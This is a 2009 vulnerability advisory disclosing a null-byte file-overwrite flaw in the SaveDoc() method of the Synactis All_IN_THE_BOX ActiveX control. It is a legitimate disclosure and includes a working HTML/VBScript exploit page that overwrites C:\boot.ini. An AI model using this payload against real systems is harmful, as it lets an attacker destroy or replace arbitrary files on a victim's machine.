|
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-006
http://www.dsecrg.com/pages/vul/show.php?id=62
Application: Synactis All_IN_THE_BOX ActiveX
Versions Affected: 3
Vendor URL: http://synactis.com
Bugs: Null byte File overwriting
Exploits: YES
Reported: 15.01.2009
Vendor response: NONE
Second Report: 22.01.2009
Vendor response: NONE
Date of Public Advisory: 30.01.2009
Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
Synactis All_IN_THE_BOX ActiveX Control (ALL_IN_THE_BOX.OCX) can be used to owervrite any any file in target system.
Vulnerable method is "SaveDoc()"
Details
*******
By default when saving file All_IN_THE_BOX ActiveX control attend extension to filename variable in "SaveDoc()" method.
For example if you enter filename "boot.ini" in "SaveDoc()" method then control will create file boot.ini.box.
But by attending a null byte to filename attacker can owervrite any file in OS (see example for owervriting boot.ini)
Class AllBox
GUID: {B5576893-F948-4E0F-9BE1-A37CB56D66FF}
Number of Interfaces: 1
Default Interface: IAllBox
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
Example:
*******
<html>
Test Exploit page
<object classid='clsid:B5576893-F948-4E0F-9BE1-A37CB56D66FF' id='sh2kerr' ></object>
<script language='vbscript'>
targetFile = "C:\PROGRA~1\Synactis\ALLIN-~1\ALL_IN~1.OCX"
prototype = "Sub SaveDoc ( ByVal aFileName As String )"
memberName = "SaveDoc"
progid = "All_In_The_Box.AllBox"
argCount = 1
arg1="C:\boot.ini"+unescape("%00")
sh2kerr.SaveDoc arg1
</script>
</html>
Fix Information
***************
No patches available.
We did not get any response from vendor for 2 weeks.
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsecrg.com
http://www.dsec.ru
# [2009-01-30]
|